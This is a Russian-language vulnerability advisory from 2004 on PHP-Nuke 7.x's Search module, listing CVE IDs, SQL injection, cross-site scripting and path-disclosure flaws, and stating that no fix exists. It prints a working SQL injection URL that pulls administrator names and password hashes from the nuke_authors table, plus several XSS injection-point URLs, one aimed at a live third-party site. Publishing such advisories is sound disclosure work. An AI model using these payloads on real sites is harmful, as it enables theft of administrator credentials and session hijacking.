Дата публикации: | 20.07.2004 |
Всего просмотров: | 2915 |
Опасность: | Средняя |
Наличие исправления: | Нет |
Количество уязвимостей: | 1 |
CVE ID: |
CVE-2004-0736 CVE-2004-0737 CVE-2004-0738 |
Вектор эксплуатации: | Удаленная |
Воздействие: |
Межсайтовый скриптинг Раскрытие важных данных Неавторизованное изменение данных |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | PHP-Nuke 7.x |
Уязвимые версии: PHP-Nuke
Описание: Несколько уязвимостей обнаружено в PHP-Nuke в 'Search' модуле. Удаленный пользователь может внедрить SQL команды. Удаленный пользователь может выполнить XSS нападение. Удаленный пользователь может также определить инсталляционный путь. 1. SQL инъекция: http://localhost/nuke73/modules.php?name=Search&type=stories&query=f00bar&category=-1 &categ=%2 0and%201=2%20UNION%20SELECT%200,0,aid,pwd,0,0,0,0,0,0%20from%20nuke_authors/*2. XSS: http://localhost/nuke73/modules.php?name=Search&sid=[xss code here] http://localhost/nuke73/modules.php?name=Search&query=*&max=[xss code here] http://localhost/nuke73/modules.php?name=Search&query=waraxe&sel1=[xss code here]&type=comments http://localhost/nuke73/modules.php?name=Search&a=6&query=*&match=[xss code here] http://www.nukecops.com/modules.php?name=Search&query=*&m od3=[xss code here] URL производителя: http://www.phpnuke.org/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
Ссылки: | [waraxe-2004-SA#036 - Multiple security holes in PhpNuke - part 3] |